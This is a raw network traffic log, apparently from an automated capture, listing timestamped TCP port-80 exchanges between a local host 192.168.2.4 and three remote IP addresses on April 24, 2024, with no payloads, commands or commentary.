                                                                  Apr 24, 2024 06:35:29.979918003 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.979959965 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.980005026 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.980043888 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.980053902 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.980078936 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.980170012 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.980214119 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.980238914 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.980278015 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.980284929 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.980314016 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.980339050 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.980360985 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.980384111 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.980401039 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.980415106 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.980453968 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.980457067 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.980489969 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.980531931 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.980671883 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.980700016 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.980746031 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.980787039 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.980839968 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.980865955 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.980886936 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.980910063 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.980921030 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.980925083 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.980962992 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.980982065 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.981026888 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.981070995 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.981101036 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.981120110 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.981123924 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.981132984 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.981153965 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.981157064 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.981197119 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.981225014 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.981276989 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.981277943 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.981321096 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.981389999 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.981427908 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.981436014 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.981475115 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.981498003 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.981519938 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.981544971 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.981558084 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.981558084 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.981604099 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.981645107 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.981667042 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.981690884 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.981702089 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.981714964 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.981760979 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.981827021 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.981867075 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.981892109 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.981931925 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.981956959 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.982001066 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.982043028 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.982069016 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.982112885 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.982213020 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.982251883 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.982266903 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.982302904 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.982321024 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.982361078 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.982438087 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.982477903 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.982496977 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.982531071 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.982537031 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.982570887 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.982592106 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.982624054 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.982628107 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.982666969 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.982705116 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.982744932 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.982759953 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.982791901 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.982799053 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.982832909 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.982871056 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.982908010 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.982917070 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.982934952 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.982958078 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.982966900 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.982995033 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.983036041 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.983045101 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.983083963 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.983093023 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.983133078 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.983201981 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.983220100 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.983242989 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.983268023 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.983269930 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.983303070 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.983309984 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.983338118 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.983342886 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.983377934 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.983383894 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.983422995 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.983439922 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.983481884 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.983484030 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.983520031 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.983524084 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.983556986 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.983561039 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.983596087 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.983633995 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.983674049 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.983679056 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.983728886 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.984985113 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.985025883 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.985081911 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.985120058 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.985137939 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.985183001 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.985208988 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.985254049 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.985541105 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.985591888 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:29.985615969 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:29.985661030 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.279185057 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.279231071 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.279289961 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.279313087 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.279336929 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.279376030 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.279386044 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.279416084 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.279422998 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.279476881 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.279516935 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.279557943 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.279562950 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.279597998 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.279619932 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.279635906 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.279639006 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.279675007 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.279686928 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.279716015 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.279725075 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.279761076 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.279792070 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.279829025 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.279850960 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.279870987 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.279925108 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.279963017 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.279973030 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280002117 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280009031 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280044079 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280066013 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280081987 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280091047 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280165911 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280203104 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280240059 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280273914 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280292988 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280309916 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280380011 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280380964 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280443907 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280452967 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280491114 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280499935 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280544996 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280561924 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280599117 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280606985 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280658007 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280668974 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280708075 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280716896 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280746937 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280746937 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280785084 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280792952 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280837059 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280854940 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280914068 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.280925989 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280963898 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.280993938 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.281023026 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.281130075 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.281166077 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.281191111 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.281219959 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.281235933 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.281287909 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.281306982 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.281346083 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.281367064 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.281399965 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.281452894 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.281507969 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.281523943 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.281563044 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.281572104 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.281649113 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.281685114 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.281702995 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.281712055 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.281742096 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.281757116 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.281794071 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.281805992 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.281831980 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.281843901 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.281871080 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.281883001 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.281918049 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.281975031 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.282022953 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.282043934 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.282080889 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.282093048 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.282130003 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.282182932 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.282226086 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.282283068 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.282330990 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.282354116 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.282392025 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.282397032 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.282435894 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.282459974 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.282497883 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.282504082 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.282542944 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.282567978 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.282607079 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.282614946 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.282644987 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.282649994 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.282680988 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.282689095 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.282722950 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.282752037 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.282792091 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.282852888 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.282897949 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.282953024 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.282994032 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:30.282996893 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:30.283055067 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:34.986757994 CEST804973787.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:35:34.986821890 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:35:39.998470068 CEST804973187.121.105.163192.168.2.4
                                                                  Apr 24, 2024 06:36:02.345621109 CEST4973780192.168.2.487.121.105.163
                                                                  Apr 24, 2024 06:36:11.724513054 CEST4973980192.168.2.447.91.88.207
                                                                  Apr 24, 2024 06:36:12.026856899 CEST804973947.91.88.207192.168.2.4
                                                                  Apr 24, 2024 06:36:12.027012110 CEST4973980192.168.2.447.91.88.207
                                                                  Apr 24, 2024 06:36:12.028460979 CEST4973980192.168.2.447.91.88.207
                                                                  Apr 24, 2024 06:36:12.330775976 CEST804973947.91.88.207192.168.2.4
                                                                  Apr 24, 2024 06:36:12.350291967 CEST804973947.91.88.207192.168.2.4
                                                                  Apr 24, 2024 06:36:12.350357056 CEST804973947.91.88.207192.168.2.4
                                                                  Apr 24, 2024 06:36:12.350481033 CEST4973980192.168.2.447.91.88.207
                                                                  Apr 24, 2024 06:36:12.351442099 CEST4973980192.168.2.447.91.88.207
                                                                  Apr 24, 2024 06:36:12.653660059 CEST804973947.91.88.207192.168.2.4
                                                                  Apr 24, 2024 06:36:55.429866076 CEST4974280192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:55.589874983 CEST8049742172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:55.590136051 CEST4974280192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:55.590217113 CEST4974280192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:55.750077963 CEST8049742172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:56.125325918 CEST8049742172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:56.125358105 CEST8049742172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:56.125535011 CEST4974280192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:56.126380920 CEST8049742172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:56.126435041 CEST4974280192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:57.091984987 CEST4974280192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:58.108922958 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:58.268870115 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:58.268995047 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:58.269227028 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:58.429025888 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:58.786345005 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:58.826276064 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:59.106257915 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.106285095 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.106303930 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.106322050 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.106384993 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.106430054 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.106441975 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:59.106468916 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.106518030 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:59.106520891 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.106574059 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:59.106584072 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.106635094 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.106683016 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.106684923 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:59.106781006 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.106832981 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:59.107148886 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.107274055 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.107332945 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:59.107348919 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.107420921 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.107489109 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:59.107852936 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.107917070 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.107970953 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:59.107995987 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.108047962 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.108097076 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:59.108836889 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.108948946 CEST8049743172.67.152.117192.168.2.4
